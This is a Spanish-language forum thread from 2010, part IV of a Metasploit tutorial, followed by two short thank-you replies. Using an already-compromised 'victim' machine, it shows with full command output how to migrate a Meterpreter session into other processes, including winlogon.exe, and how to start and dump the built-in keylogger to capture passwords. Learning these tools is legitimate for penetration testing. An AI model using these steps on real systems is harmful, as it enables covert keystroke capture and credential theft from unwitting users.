• General

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #209158  por shiva-sheva
 23 Jul 2010, 06:45
+Temario
-+¿Que es el keylogging?
-+¿Keylogging con meterprete?
-+¿Que es migrate?
-+Usando migrate
-+Comando getpid
-+Keylogger
-+Keylogger dump
-+Migrate keylogger
-+Clonclusion
  • Bueno en las primeras III partes del taller pudimos obtener
    la revers shell Meterpreter en nuestra victima (mi caso)
    y ahora les voy a enseñar a hacer unas tecnicas que nos seran
    muy utiles para poder no perder la session que y alogramos
    y algunas otras cosas interesantes.
+¿Que es el keylogging?
  • Beno pues su nombre lo dice y creo que todo en el foro
    conoseran un keyloger pero no en este modo cuando consegimos
    un revers shell meterpreter realmente tenemos una alta gama
    de herramientas para poder obtener informacion sobre nuestra victima
    y a si mismo poder tener una mejor session de pentesting.

+¿Keylogging con meterprete?
  • Asi es como lo mencione chico tenemos una alta gama de "jugetes"
    cuando obtenemos una meterpreter shell y bueno uno de estos jugetes
    es el keylogger que nos ofrece meterpreter es perfecto para obtener
    contraseñas usuarios informacion de la victima.

+¿Que es migrate?

  • Tambien es un muy buen comando que nos ofrece la shell meterpreter
    y nos sirve para migrar nuestra shell al un proceso especifico
    y esto nos si por ejemplo se pierde la conexion podamos remota la
    session y no tengamos que hacer todo de nuevomuy util no?
+Usando migrate
  • bueno ahora vamos a usar el comando migrate dentro de nuestra
    shell meterpreter y vamos a migrar nuestra shell para no
    perder la conexion ya que esto nos ayuda bastante para nuetsro
    fines....

    Vamos a nuestra session de metasploit y bueno ya teniendo acceso
    al objetivo tecleamos lo sigiente...
Código: Seleccionar todo
meterpreter > ps

Process list
============

 PID   Name                          Arch  Session  User                          Path
 ---   ----                          ----  -------  ----                          ----
 0     [System Process]                                                           
 4     System                        x86   0        NT AUTHORITY\SYSTEM           
 516   smss.exe                      x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 572   csrss.exe                     x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 596   winlogon.exe                  x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 640   services.exe                  x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 652   lsass.exe                     x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 796   ibmpmsvc.exe                  x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\ibmpmsvc.exe
 832   ati2evxx.exe                  x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Ati2evxx.exe
 852   svchost.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 940   svchost.exe                   x86   0        NT AUTHORITY\Servicio de red  C:\WINDOWS\system32\svchost.exe
 1004  svchost.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1132  svchost.exe                   x86   0        NT AUTHORITY\Servicio de red  C:\WINDOWS\system32\svchost.exe
 1180  svchost.exe                   x86   0        NT AUTHORITY\SERVICIO LOCAL   C:\WINDOWS\system32\svchost.exe
 1392  spoolsv.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1492  TPHKSVC.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\LENOVO\HOTKEY\TPHKSVC.exe
 1600  AppleMobileDeviceService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe
 1612  mDNSResponder.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\Bonjour\mDNSResponder.exe
 1724  nod32krn.exe                  x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\Eset\nod32krn.exe
 1824  SMAgent.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\Analog Devices\SoundMAX\SMAgent.exe
 1876  svchost.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 424   alg.exe                       x86   0        NT AUTHORITY\SERVICIO LOCAL   C:\WINDOWS\System32\alg.exe
 328   ati2evxx.exe                  x86   0        ONWER_IBM\SYSTEM             C:\WINDOWS\system32\Ati2evxx.exe
 1040  explorer.exe                  x86   0        OWNER_IBM\SYSTEM             C:\WINDOWS\Explorer.EXE
 1816  TpShocks.exe                  x86   0        OWNER_IBM\SYSTEM             C:\WINDOWS\system32\TpShocks.exe
 1736  EZEJMNAP.EXE                  x86   0        OWNER_IBM\SYSTEM             C:\ARCHIV~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
 1776  rundll32.exe                  x86   0        OWNER_IBM\SYSTEM             C:\WINDOWS\system32\RunDll32.exe
 1540  AGRSMMSG.exe                  x86   0        OWNER_IBM\SYSTEM             C:\WINDOWS\AGRSMMSG.exe
 2016  TPOSDSVC.exe                  x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\Lenovo\HOTKEY\TPOSDSVC.exe
 2064  iTunesHelper.exe              x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\iTunes\iTunesHelper.exe
 2136  TPONSCR.exe                   x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\Lenovo\HOTKEY\TPONSCR.exe
 2228  jusched.exe                   x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\Java\jre1.6.0_03\bin\jusched.exe
 2248  TpScrex.exe                   x86   0        JULIAN_IBM\SYSTEM             C:\Archivos de programa\Lenovo\Zoom\TpScrex.exe
 2256  ctfmon.exe                    x86   0        OWNER_IBM\SYSTEM             C:\WINDOWS\system32\ctfmon.exe
 2296  msnmsgr.exe                   x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe
 2436  nod32kui.exe                  x86   0        OWNER_IBM\JSYSTEM             C:\Archivos de programa\Eset\nod32kui.exe
 2916  iPodService.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Archivos de programa\iPod\bin\iPodService.exe
 1104  wlcomm.exe                    x86   0        OWNER_IBM\SYSTEM             C:\Archivos de programa\Windows Live\Contacts\wlcomm.exe
 1760  jucheck.exe                   x86   0        JOWNER_IBM\SYSTEM             C:\Archivos de programa\Java\jre1.6.0_03\bin\jucheck.exe

meterpreter > 
  • Vemos los procesos y bueno elegimos uno para migrarlo
Código: Seleccionar todo
meterpreter > migrate 2064
[*] Migrating to 2064...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2064
+Comando getpid
  • Bueno simple nos sirve para ver en que nuemero de proceso esta
    alojado nuestro shell ...
+Keylogger
  • Bueno ahora si vamos aver como lanzar el keylogger para poder
    ver las capturas de la victima.
Código: Seleccionar todo
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter >
  • Bueno con este comando lanzamos el keylogger y esperamos
    un rato o segundos como ustedes quieran y vamos a hacer
    el dump al keylogger para que nos de lo que guardo...
+Keylogger dump
Código: Seleccionar todo
meterpreter > keyscan_dump
Dumping captured keystrokes...
   prueba para indetectables.net 

+Migrate keylogger
  • Bueno y si quieres un bonus jejeje vamos a migrar el proceso
    para capturar todo lo que escriban cualquier usuario que inicie
    session mientras el sistema se este ejecutando...
Código: Seleccionar todo
meterpreter > ps

Process list
============

 PID   Name                 Path
 ---   ----     
 0     [System Process]                                                           
 47    winlogon.exe      C:\WINT\system32\winlogon.exe                          

meterpreter > migrate 47

[*] Migrating to 47...
[*] Migration completed successfully.
+Conclusion
  • Y bueno hasta aquile dejamosla parte IV
    espero vayan aprendiendo cada vez un poco mas
    de esta pontente herramienta metasploit saludos
    esperen la part V.
 #209178  por Slek
 23 Jul 2010, 08:48
Impresionante!
Está muy completa la guía. No tenía ni idea que que incluia un Keylogger xDD

Saludos y Sigue así!!!
 #209221  por osx
 23 Jul 2010, 12:29
Buenisimo shiva-sheva esperando la parte V!

gracias